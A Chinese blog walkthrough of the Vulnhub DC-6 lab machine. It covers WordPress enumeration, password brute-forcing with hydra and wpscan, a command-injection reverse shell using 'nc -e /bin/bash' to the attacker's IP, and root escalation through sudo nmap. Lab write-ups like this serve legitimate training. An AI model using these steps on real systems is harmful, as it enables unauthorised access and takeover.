Vulnhub靶场 DC-6

目录

一、环境搭建

二、主机发现

三、漏洞复现

1、wpscan工具

2、后台识别 dirsearch

3、爆破密码

4、rce漏洞利用 activity monitor

5、rce写shell

6、新线索 账户

7、提权

8、拿取flag

四、总结

一、环境搭建

Vulnhub靶机下载:

官网地址:https://download.vulnhub.com/dc/DC-6.zip

虚拟机:VM虚拟机 或者VBOX 导入即可

网络环境:NAT

介绍:vulnhub是个提供各种漏洞平台的综合靶场,拿到root权限才可以发现最终的flag。

二、主机发现

查看服务

nmap -A -p- -v 192.168.176.144

修改本机hosts 进入网站

192.168.176.144 wordy

cms识别

很简单的一看,就是WordPress

三、漏洞复现

1、wpscan工具

wpscan --url http://wordy/ 直接扫描

wpscan --url http://wordy/ -e 查看用户

分别有:admin、mark、graham、sarah、jens 

2、后台识别 dirsearch

dirsearch -u http://192.168.176.144/ -e php

http://192.168.176.144/wp-admin/

3、爆破密码

hy

字典: /usr/share/wordlists kali自带 gunzip rockyou.txt.gz 解压

hydra -l mark -P /usr/share/wordlists ssh://192.168.176.144

wp

wpscan --url http://wordy/ --passwords /usr/share/wordlists/rockyou.txt

上面爆破无果

根据提升线索

https://img-blog.csdnimg.cn/4afcc591deda456ea6d9caaaa2033caf.png

cat /usr/share/wordlists/rockyou.txt | grep k01 > /home/kali/passwords.txt

把五个用户 生成了一个字典 vim username :admin、mark、graham、sarah、jens

wpscan --url http://wordy/ -U username.txt -P passwords.txt

找到一个:mark /helpdesk01

4、rce漏洞利用 activity monitor

登录网站发现了activity monitor 这个漏洞发现了activity monitor 这个漏洞

MSF 测试一下activity monitor漏洞利用

msfconsole
search activity monitormsf6 
set lport 1122
set password helpdesk01
set username mark
set rhosts 192.168.176.144
set ForceExploit true
run

没有利用成功

网站测试一下

可以看见 读取了目录信息

5、rce写shell

建立反向连接payload

ping 192.168.176.134| nc -e /bin/bash 192.168.176.134 9999

交互式shell

python -c "import pty; pty.spawn('/bin/bash')"

6、新线索 账户

寻找到了 graham的密码 GSo7isUM1D4

大体意思:

-恢复超级硬盘的全部功能(需要与Jens交谈)

-为莎拉的告别派对买礼物

-添加新用户:graham-GSo7isUM1D4-完成

-申请OSCP课程

-为Sarah的替代者购买新的笔记本电脑

ssh连接graham

ssh graham@192.168.176.144 -p 22

jens目录下有个backups.sh文件,使用命令sudo -l看看有哪些可执行的命令

sudo -l

发现graham用户可以无密码执行backups.sh文件,所以我们可以利用这个脚本获取到jens用户的shell

cat /dev/null > backups.sh 将脚本文件内容清空,

echo "/bin/bash" >> backups.sh 文件中写入/bin/bash

7、提权

查看jens用户的权限和可用的命令

发现jens用户可以无密码以root用户权限执行/usr/bin/nmap命令,

echo "os.execute('/bin/bash')" >> root1 将命令写入到root1文件中

sudo nmap --script=root1 来执行nmap命令进行提权

成功提权,然后再跳转到/root目录下即可看到flag

8、拿取flag

四、总结

1、熟悉ctivity monitor漏洞点

2、熟悉wp、hy暴力破解

3、熟悉nmap脚本提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/388482.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

了解Ping、Wget、端口、Netstat和Curl命令

了解Ping、Wget、端口、Netstat和Curl命令

1. 端口 1.1 什么是端口? 端口是一种用于标识不同应用程序或服务的逻辑通道。它是一个数字,取值范围从0到65535。常见的端口有一些已经被标准化,比如HTTP使用的80端口,HTTPS使用的443端口。 1.2 了解端口状态 使用netstat -an…
阅读更多...
超详细的介绍Python语句

超详细的介绍Python语句

一、 常用命令 在介绍Python语句之前,先介绍一下几个有用的Python命令。 dir(模块名或类名或变量名或表达式名):获得当前模块、变量对应类型、表达式计算值对应类的属性列表 type(变量名或表达式名):获取变量或表达式计算值的对…
阅读更多...
URL编码算法:解决特殊字符在URL中的烦恼

URL编码算法:解决特殊字符在URL中的烦恼

引言: URL编码算法是一种将URL中的特殊字符转换为特定格式的编码方式。它在网络传输中起到了保护数据安全与完整性的重要作用。本文将深入探讨URL编码算法的优点与缺点,并介绍它在Web开发、网络安全等方面的应用。 URL编码解码 | 一个覆盖广泛主题工具…
阅读更多...
C++类和对象-C++对象模型和this指针->成员变量和成员函数分开存储、this指针概念、空指针访问成员函数、const修饰成员函数

C++类和对象-C++对象模型和this指针->成员变量和成员函数分开存储、this指针概念、空指针访问成员函数、const修饰成员函数

#include<iostream> using namespace std; //成员变量 和 成员函数 分开储存的 class Person { public: Person() { mA 0; } //非静态成员变量占对象空间 int mA; //静态成员变量不占对象空间 static int mB; //函数也不占对象空间…
阅读更多...
【leetcode】深搜、暴搜、回溯、剪枝(C++)2

【leetcode】深搜、暴搜、回溯、剪枝(C++)2

深搜、暴搜、回溯、剪枝&#xff08;C&#xff09;2 一、括号生成1、题目描述2、代码3、解析 二、组合1、题目描述2、代码3、解析 三、目标和1、题目描述2、代码3、解析 四、组合总和1、题目描述2、代码3、解析 五、字母大小写全排列1、题目描述2、代码3、解析 六、优美的排列1…
阅读更多...
《合成孔径雷达成像算法与实现》Figure6.13

《合成孔径雷达成像算法与实现》Figure6.13

clc clear close all参数设置 距离向参数设置 R_eta_c 20e3; % 景中心斜距 Tr 2.5e-6; % 发射脉冲时宽 Kr 20e12; % 距离向调频率 alpha_os_r 1.2; % 距离过采样率 Nrg 320; % 距离线采样数 距离向…
阅读更多...
ChatGPT重大升级:能自动记住用户的习惯和喜好,用户有权决定是否共享数据给OpenAI

ChatGPT重大升级:能自动记住用户的习惯和喜好,用户有权决定是否共享数据给OpenAI

OpenAI刚刚宣布了ChatGPT的一项激动人心的更新&#xff01; OpenAI在ChatGPT中新加了记忆功能和用户控制选项&#xff0c;这意味着GPT能够在与用户的互动中记住之前的对话内容&#xff0c;并利用这些信息在后续的交谈中提供更加相关和定制化的回答。 这一功能目前正处于测试阶…
阅读更多...
六、Mybatis注解开发

六、Mybatis注解开发

1.MyBatis的常用注解 注解开发越来越流行&#xff0c; Mybatis也可以使用注解开发方式&#xff0c;这样就可以减少编写Mapper映射文件。Insert&#xff1a;实现新增Update&#xff1a;实现更新Delete&#xff1a;实现删除Select&#xff1a;实现查询Result&#xff1a;实现结果…
阅读更多...
BigDecimal的常用API

BigDecimal的常用API

BigDecimal用于解决浮点型运算时结果出现失真的问题。 这里0.20.1等于0.3就出现了失真 import java.math.BigDecimal; import java.math.RoundingMode;public class Test {public static void main(String[] args) {//BigDeciaml的使用&#xff1a;解决小数运算失真的问题doub…
阅读更多...
【HarmonyOS 4.0 应用开发实战】ArkTS 快速入门之常用属性(3)

【HarmonyOS 4.0 应用开发实战】ArkTS 快速入门之常用属性(3)

个人名片&#xff1a; &#x1f43c;作者简介&#xff1a;一名大三在校生&#xff0c;喜欢AI编程&#x1f38b; &#x1f43b;‍❄️个人主页&#x1f947;&#xff1a;落798. &#x1f43c;个人WeChat&#xff1a;hmmwx53 &#x1f54a;️系列专栏&#xff1a;&#x1f5bc;️…
阅读更多...
【每日一题】 2024年2月汇编(上)

【每日一题】 2024年2月汇编(上)

&#x1f525;博客主页&#xff1a; A_SHOWY&#x1f3a5;系列专栏&#xff1a;力扣刷题总结录 数据结构 云计算 数字图像处理 力扣每日一题_ 【2.1】LCP 24.数字游戏 LCP 24. 数字游戏https://leetcode.cn/problems/5TxKeK/ 这个题目可以变换一下就是将一个递增的需求经过…
阅读更多...
Python-web自动化-Playwright的学习

Python-web自动化-Playwright的学习

Python-web自动化-Playwright的学习 1. 安装playwright2. 界面等待3. 自动化代码助手4. 定位元素1. css selector定位2. xpath定位3. get_by_XXX定位 5. 操作元素1. 单选框、复选框2. select下拉框3. 网页操作4. 框架页 frame5. 窗口切换6. 截屏 1. 安装playwright pip命令 pi…
阅读更多...
全闭环直播推流桌面分享远控系统

全闭环直播推流桌面分享远控系统

直播推流涉及多协议&#xff0c;多端技术栈和知识点&#xff0c;&#xff0c;想要做好并不容易&#xff0c;经过几年时间的迭代&#xff0c;终于小有成就&#xff0c;聚集了媒体服务器&#xff0c;实时会议sfu&#xff0c;远控kvm等功能。可以做一个音视频应用的瑞士小军刀。主…
阅读更多...
【MySQL】学习外键约束处理员工数据

【MySQL】学习外键约束处理员工数据

&#x1f308;个人主页: Aileen_0v0 &#x1f525;热门专栏: 华为鸿蒙系统学习|计算机网络|数据结构与算法 ​&#x1f4ab;个人格言:“没有罗马,那就自己创造罗马~” #mermaid-svg-g4glZPIY0IKhiTfe {font-family:"trebuchet ms",verdana,arial,sans-serif;font-siz…
阅读更多...
每日五道java面试题之java基础篇(九)

每日五道java面试题之java基础篇(九)

目录&#xff1a; 第一题 你们项⽬如何排查JVM问题第二题 ⼀个对象从加载到JVM&#xff0c;再到被GC清除&#xff0c;都经历了什么过程&#xff1f;第三题 怎么确定⼀个对象到底是不是垃圾&#xff1f;第四题 JVM有哪些垃圾回收算法&#xff1f;第五题 什么是STW&#xff1f; 第…
阅读更多...
(14)Hive调优——合并小文件

(14)Hive调优——合并小文件

目录 一、小文件产生的原因 二、小文件的危害 三、小文件的解决方案 3.1 小文件的预防 3.1.1 减少Map数量 3.1.2 减少Reduce的数量 3.2 已存在的小文件合并 3.2.1 方式一&#xff1a;insert overwrite (推荐) 3.2.2 方式二&#xff1a;concatenate 3.2.3 方式三&#xff…
阅读更多...
VS Code中的JDK设置

VS Code中的JDK设置

在VS Code使用中&#xff0c;如果机器只安装了一个版本的JDK版本&#xff0c;一般不需要特别关注JDK 的配置&#xff0c;但是在以下状况下&#xff0c;需要对JDK进行特别的配置&#xff1a; 机器有多个JDK版本&#xff0c;不同的项目使用不同的JDK版本项目使用的JDK版本较低&a…
阅读更多...
【C/C++】2024春晚刘谦春晚魔术步骤模拟+暴力破解

【C/C++】2024春晚刘谦春晚魔术步骤模拟+暴力破解

在这个特别的除夕夜&#xff0c;我们不仅享受了与家人的温馨团聚&#xff0c;还被电视机前的春节联欢晚会深深吸引。特别是&#xff0c;魔术师刘谦的精彩表演&#xff0c;为我们带来了一场视觉和心灵的盛宴。在我的博客“【C/C】2024春晚刘谦春晚魔术步骤模拟暴力破解”中&…
阅读更多...
洛谷C++简单题小练习day12—寻找最小值小程序

洛谷C++简单题小练习day12—寻找最小值小程序

day12--寻找最小值--2.16 习题概述 题目描述 给出 n 和 n 个整数 ai​&#xff0c;求这 n 个整数中最小值是什么。 输入格式 第一行输入一个正整数 n&#xff0c;表示数字个数。 第二行输入 n 个非负整数&#xff0c;表示 1,2…a1​,a2​…an​&#xff0c;以空格隔开。 …
阅读更多...
leetcode:343.整数拆分

leetcode:343.整数拆分

解题思路&#xff1a; 拆分的越多越好&#xff08;暂且认为&#xff09;&#xff0c;尽可能拆成m个近似相等的数&#xff0c;会使得乘积最大 dp含义&#xff1a;将i进行拆分得到最大的积为dp[i] 递推公式&#xff1a;j x dp[i-j](固定j&#xff0c;只通过凑dp[i-j]进而实现所…
阅读更多...
最新文章

Copyright @ 2022~2023